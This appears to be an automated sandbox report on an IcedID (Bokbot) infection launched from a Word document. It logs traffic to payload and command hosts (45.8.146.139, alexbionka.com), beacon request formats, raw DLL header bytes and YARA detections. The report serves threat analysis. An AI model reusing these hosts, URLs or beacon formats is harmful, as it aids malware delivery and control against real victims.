Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80
Source: global traffic TCP traffic: 64.227.108.27:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80
Source: global traffic TCP traffic: 64.227.108.27:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 64.227.108.27:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 64.227.108.27:80

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\rundll32.exe Network Connect: 64.227.108.27 80 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Domain query: alexbionka.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: alexbionka.com
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3570055661:1:5038:57; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323130393739:416C627573:30423335313032443133344136373743; __io=0; _gid=67AFEDC5AC03Host: alexbionka.com
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 64.227.108.27 64.227.108.27
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 11 Aug 2022 15:27:53 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34X-Powered-By: PHP/7.2.34Content-Description: File TransferContent-Disposition: attachment; filename="loader_p3_dll_64_n3_crypt_x64_asm_clone_n152.dll"Expires: 0Cache-Control: must-revalidatePragma: publicContent-Length: 360448Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 55 ef 34 c3 11 8e 5a 90 11 8e 5a 90 11 8e 5a 90 02 e9 59 91 10 8e 5a 90 59 e0 5a 91 10 8e 5a 90 33 e6 a5 90 10 8e 5a 90 6a e1 58 91 10 8e 5a 90 52 69 63 68 11 8e 5a 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 59 d1 f4 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 12 0e 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 07 00 0c 00 06 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 91 9d 05 00 03 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 90 05 00 7d 01 00 00 00 00 00 00 00 00 00 00 00 a0 05 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 77 05 00 00 10 00 00 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7d 01 00 00 00 90 05 00 00 02 00 00 00 7c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 a0 05 00 00 02 00 00 00 7e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.8.146.139Connection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 11 Aug 2022 15:28:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 30 63 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 6c 65 78 62 69 6f 6e 6b 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at alexbionka.com Port 80</address></body></html>0
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: rundll32.exe, 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.146
Source: r8F8A.tmp.exe, 00000004.00000002.947212998.0000000000544000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO651
Source: rundll32.exe, 00000005.00000002.946500904.0000000000134000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm
Source: r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm&
Source: rundll32.exe, 00000005.00000002.946524016.0000000000420000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm516F-U91Z1DJNJ2U9D-823/rm3/rm3/rm
Source: r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmT&
Source: r8F8A.tmp.exe, 00000004.00000002.947204650.0000000000520000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rma
Source: r8F8A.tmp.exe, 00000004.00000002.947197812.0000000000360000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmj
Source: r8F8A.tmp.exe, 00000004.00000002.947204650.0000000000520000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmli
Source: r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmv&
Source: rundll32.exe, 00000005.00000002.946611241.0000000000504000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://alexbionka.com/
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4221A912-2B82-4834-A4D3-95CF1F77F776}.tmp Jump to behavior
Source: unknown DNS traffic detected: queries for: alexbionka.com
Source: global traffic HTTP traffic detected: GET /fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.8.146.139Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3570055661:1:5038:57; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323130393739:416C627573:30423335313032443133344136373743; __io=0; _gid=67AFEDC5AC03Host: alexbionka.com

E-Banking Fraud
barindex
Yara detected IcedID
Source: Yara match File source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR
Source: Yara match File source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE Matched rule: Detects IceID / Bokbot variants Author: ditekSHen
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects IceID / Bokbot variants Author: ditekSHen
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
Source: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
